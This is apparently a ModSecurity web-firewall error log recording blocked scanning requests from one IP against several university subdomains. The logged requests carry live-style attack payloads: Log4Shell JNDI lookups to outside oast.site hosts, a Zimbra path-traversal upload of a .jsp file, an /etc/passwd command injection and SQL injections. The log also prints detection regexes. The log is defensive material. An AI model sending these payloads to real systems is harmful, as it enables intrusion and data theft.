[Tue Aug 29 11:34:10.312082 2023] [:error] [pid 1164] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:PK\\x03\\x04\\x14\\x00\\b\\x00\\b\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x00\\x00\\x00../../../../ found within ARGS:PK\\x5cx03\\x5cx04\\x5cx14\\x5cx00\\x5cb\\x5cx00\\x5cb\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00: \\x00\\x00\\x00../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jsp\\x1c\\xc8\\xbd\\x0a\\xc20\\x10\\x00\\xe0\\xbdOQ\\x02\\x85\\x04!(\\xb8U\\x5c\\xfc[\\xc4\\x16;\\xb4t;\\xdbCS\\xcf$\\xc6K\\xf4\\xf1E\\xd7oUd.\\xb2\\xf6\\xc1X"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/service/extension/backup/mboximport"] [unique_id "ZO11QsCo-f0AAASMggAAAAAO"]
[Tue Aug 29 11:34:10.313117 2023] [:error] [pid 1156] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:PK\\x03\\x04\\x14\\x00\\b\\x00\\b\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x00\\x00\\x00../../../../ found within ARGS:PK\\x5cx03\\x5cx04\\x5cx14\\x5cx00\\x5cb\\x5cx00\\x5cb\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00: \\x00\\x00\\x00../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jsp\\x1c\\xc8\\xbd\\x0a\\xc20\\x10\\x00\\xe0\\xbdOQ\\x02\\x85\\x04!(\\xb8U\\x5c\\xfc[\\xc4\\x16;\\xb4t;\\xdbCS\\xcf$\\xc6K\\xf4\\xf1E\\xd7oUd.\\xb2\\xf6\\xc1X"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/service/extension/backup/mboximport"] [unique_id "ZO11QsCo-f0AAASEJS4AAAAE"]
[Tue Aug 29 11:34:10.320627 2023] [:error] [pid 1104] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:username: admin cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/cgi-bin/weblogin.cgi"] [unique_id "ZO11QsCo-f0AAARQ4GIAAAAB"]
[Tue Aug 29 11:34:10.327532 2023] [:error] [pid 1034] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:PK\\x03\\x04\\x14\\x00\\b\\x00\\b\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x00\\x00\\x00../../../../ found within ARGS:PK\\x5cx03\\x5cx04\\x5cx14\\x5cx00\\x5cb\\x5cx00\\x5cb\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00: \\x00\\x00\\x00../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jsp\\x1c\\xc8\\xbd\\x0a\\xc20\\x10\\x00\\xe0\\xbdOQ\\x02\\x85\\x04!(\\xb8U\\x5c\\xfc[\\xc4\\x16;\\xb4t;\\xdbCS\\xcf$\\xc6K\\xf4\\xf1E\\xd7oUd.\\xb2\\xf6\\xc1X"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/service/extension/backup/mboximport"] [unique_id "ZO11QsCo-f0AAAQKOskAAAAs"]
[Tue Aug 29 11:34:10.331434 2023] [:error] [pid 1171] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:username: admin cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/cgi-bin/weblogin.cgi"] [unique_id "ZO11QsCo-f0AAAST5AYAAAAZ"]
[Tue Aug 29 11:34:10.347152 2023] [:error] [pid 1034] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:username: admin cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/cgi-bin/weblogin.cgi"] [unique_id "ZO11QsCo-f0AAAQKOsoAAAAs"]
[Tue Aug 29 11:34:10.356925 2023] [:error] [pid 1168] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:username: admin cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/cgi-bin/weblogin.cgi"] [unique_id "ZO11QsCo-f0AAASQqAYAAAAT"]
[Tue Aug 29 11:34:10.367026 2023] [:error] [pid 971] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:x. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:x: ${jndi:ldap://${:-178}${:-654}.${hostName}.uri.cjmn8l5jmimk2adbbnlgdp1r3wryyxy4p.oast.site/a}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZO11QsCo-f0AAAPLwGAAAAAX"]
[Tue Aug 29 11:34:10.375214 2023] [:error] [pid 1159] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:x. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:x: ${jndi:ldap://${:-178}${:-654}.${hostName}.uri.cjmn8l5jmimk2adbbnlgyemagkrpp3nwe.oast.site/a}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/"] [unique_id "ZO11QsCo-f0AAASHh6QAAAAD"]
[Tue Aug 29 11:34:10.375817 2023] [:error] [pid 1168] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:x. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:x: ${jndi:ldap://${:-178}${:-654}.${hostName}.uri.cjmn8l5jmimk2adbbnlgxdy4az6ysebfm.oast.site/a}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/"] [unique_id "ZO11QsCo-f0AAASQqAcAAAAT"]
[Tue Aug 29 11:34:10.380138 2023] [:error] [pid 1104] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:x. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:x: ${jndi:ldap://${:-178}${:-654}.${hostName}.uri.cjmn8l5jmimk2adbbnlg75hawn6wji6jr.oast.site/a}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/"] [unique_id "ZO11QsCo-f0AAARQ4GUAAAAB"]
[Tue Aug 29 11:34:10.381615 2023] [:error] [pid 1170] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:x. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:x: ${jndi:ldap://${:-178}${:-654}.${hostName}.uri.cjmn8l5jmimk2adbbnlgsfoe5ajtmkieq.oast.site/a}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/"] [unique_id "ZO11QsCo-f0AAASS7@IAAAAY"]
[Tue Aug 29 11:34:10.397750 2023] [:error] [pid 1171] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:PK\\x03\\x04\\x14\\x00\\b\\x00\\b\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x00\\x00\\x00../../../../ found within ARGS:PK\\x5cx03\\x5cx04\\x5cx14\\x5cx00\\x5cb\\x5cx00\\x5cb\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00: \\x00\\x00\\x00../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jsp\\x1c\\xc8\\xbd\\x0a\\xc20\\x10\\x00\\xe0\\xbdOQ\\x02\\x85\\x04!(\\xb8U\\x5c\\xfc[\\xc4\\x16;\\xb4t;\\xdbCS\\xcf$\\xc6K\\xf4\\xf1E\\xd7oUd.\\xb2\\xf6\\xc1X"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/service/extension/backup/mboximport"] [unique_id "ZO11QsCo-f0AAAST5AkAAAAZ"]
[Tue Aug 29 11:34:11.303514 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:company_id[1][0]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ))) --  found within ARGS:company_id[1][0]: test\\x22) and extractvalue(1,concat(0x7e,md5(999999999))) -- a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11Q8Co-f0AAAPDoMwAAAAP"]
[Tue Aug 29 11:34:11.304849 2023] [:error] [pid 1183] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:company_id[1][0]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ))) --  found within ARGS:company_id[1][0]: test\\x22) and extractvalue(1,concat(0x7e,md5(999999999))) -- a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11Q8Co-f0AAASfNu4AAAAg"]
[Tue Aug 29 11:34:11.306098 2023] [:error] [pid 1164] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:company_id[1][0]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ))) --  found within ARGS:company_id[1][0]: test\\x22) and extractvalue(1,concat(0x7e,md5(999999999))) -- a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11Q8Co-f0AAASMggUAAAAO"]
[Tue Aug 29 11:34:11.313311 2023] [:error] [pid 1159] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:company_id[1][0]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ))) --  found within ARGS:company_id[1][0]: test\\x22) and extractvalue(1,concat(0x7e,md5(999999999))) -- a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO11Q8Co-f0AAASHh6YAAAAD"]
[Tue Aug 29 11:34:11.339863 2023] [:error] [pid 1159] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:username: admin cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/cgi-bin/weblogin.cgi"] [unique_id "ZO11Q8Co-f0AAASHh6cAAAAD"]
[Tue Aug 29 11:34:11.372790 2023] [:error] [pid 1183] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '-- - found within ARGS:username: admin' or '1'='1'-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/classes/Login.php"] [unique_id "ZO11Q8Co-f0AAASfNvEAAAAg"]
[Tue Aug 29 11:34:11.377593 2023] [:error] [pid 1160] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:company_id[1][0]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ))) --  found within ARGS:company_id[1][0]: test\\x22) and extractvalue(1,concat(0x7e,md5(999999999))) -- a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11Q8Co-f0AAASI0A8AAAAG"]
[Tue Aug 29 11:34:11.423217 2023] [:error] [pid 1168] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:${jndi:ldap://${:-178}${:-654}.${hostName}.cookiename.cjmn8l5jmimk2adbbnlg495kisaxs56bd.oast.site}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: - found within REQUEST_COOKIES:${jndi:ldap://${:-178}${:-654}.${hostName}.cookiename.cjmn8l5jmimk2adbbnlg495kisaxs56bd.oast.site}: ${jndi:ldap://${:-178}${:-654}.${hostName}.cookievalue.cjmn8l5jmimk2adbbnlgjoga16c4saiyz.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "pusatbahasa.unla.ac.id"] [uri "/"] [unique_id "ZO11Q8Co-f0AAASQqA4AAAAT"]
[Tue Aug 29 11:34:11.442528 2023] [:error] [pid 971] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:${jndi:ldap://${:-178}${:-654}.${hostName}.cookiename.cjmn8l5jmimk2adbbnlgauswhszh9roi8.oast.site}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: - found within REQUEST_COOKIES:${jndi:ldap://${:-178}${:-654}.${hostName}.cookiename.cjmn8l5jmimk2adbbnlgauswhszh9roi8.oast.site}: ${jndi:ldap://${:-178}${:-654}.${hostName}.cookievalue.cjmn8l5jmimk2adbbnlgi6q96h49fceuf.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "journal.unla.ac.id"] [uri "/"] [unique_id "ZO11Q8Co-f0AAAPLwGMAAAAX"]
[Tue Aug 29 11:34:12.337341 2023] [:error] [pid 971] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:sort. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ))) --  found within ARGS:sort: 1 and extractvalue(1,concat(0x7e,md5(999999999))) -- "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/api.php"] [unique_id "ZO11RMCo-f0AAAPLwGQAAAAX"]
[Tue Aug 29 11:34:12.397236 2023] [:error] [pid 1034] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:sort. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ))) --  found within ARGS:sort: 1 and extractvalue(1,concat(0x7e,md5(999999999))) -- "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/api.php"] [unique_id "ZO11RMCo-f0AAAQKOtYAAAAs"]
[Tue Aug 29 11:34:12.397826 2023] [:error] [pid 971] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:sort. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ))) --  found within ARGS:sort: 1 and extractvalue(1,concat(0x7e,md5(999999999))) -- "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/api.php"] [unique_id "ZO11RMCo-f0AAAPLwGUAAAAX"]
[Tue Aug 29 11:34:12.401360 2023] [:error] [pid 1159] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:PK\\x03\\x04\\x14\\x00\\b\\x00\\b\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x00\\x00\\x00../../../../ found within ARGS:PK\\x5cx03\\x5cx04\\x5cx14\\x5cx00\\x5cb\\x5cx00\\x5cb\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00: \\x00\\x00\\x00../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jsp\\x1c\\xc8\\xbd\\x0a\\xc20\\x10\\x00\\xe0\\xbdOQ\\x02\\x85\\x04!(\\xb8U\\x5c\\xfc[\\xc4\\x16;\\xb4t;\\xdbCS\\xcf$\\xc6K\\xf4\\xf1E\\xd7oUd.\\xb2\\xf6\\xc1X"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/service/extension/backup/mboximport"] [unique_id "ZO11RMCo-f0AAASHh60AAAAD"]
[Tue Aug 29 11:34:12.407230 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:sort. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ))) --  found within ARGS:sort: 1 and extractvalue(1,concat(0x7e,md5(999999999))) -- "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/api.php"] [unique_id "ZO11RMCo-f0AAAPDoM8AAAAP"]
[Tue Aug 29 11:34:12.422526 2023] [:error] [pid 1034] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:sort. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ))) --  found within ARGS:sort: 1 and extractvalue(1,concat(0x7e,md5(999999999))) -- "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/api.php"] [unique_id "ZO11RMCo-f0AAAQKOtcAAAAs"]
[Tue Aug 29 11:34:12.423072 2023] [:error] [pid 1164] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:x. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:x: ${jndi:ldap://${:-178}${:-654}.${hostName}.uri.cjmn8l5jmimk2adbbnlgiekrzq3chbykx.oast.site/a}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZO11RMCo-f0AAASMggkAAAAO"]
[Tue Aug 29 11:34:12.432789 2023] [:error] [pid 1165] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:company_id[1][0]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ))) --  found within ARGS:company_id[1][0]: test\\x22) and extractvalue(1,concat(0x7e,md5(999999999))) -- a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11RMCo-f0AAASNzpsAAAAQ"]
[Tue Aug 29 11:34:13.313162 2023] [:error] [pid 1104] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:userIdentifiers. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: union(select found within ARGS:userIdentifiers: -1)union(select(3),null,null,null,null,null,str(98989*44313),null"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag 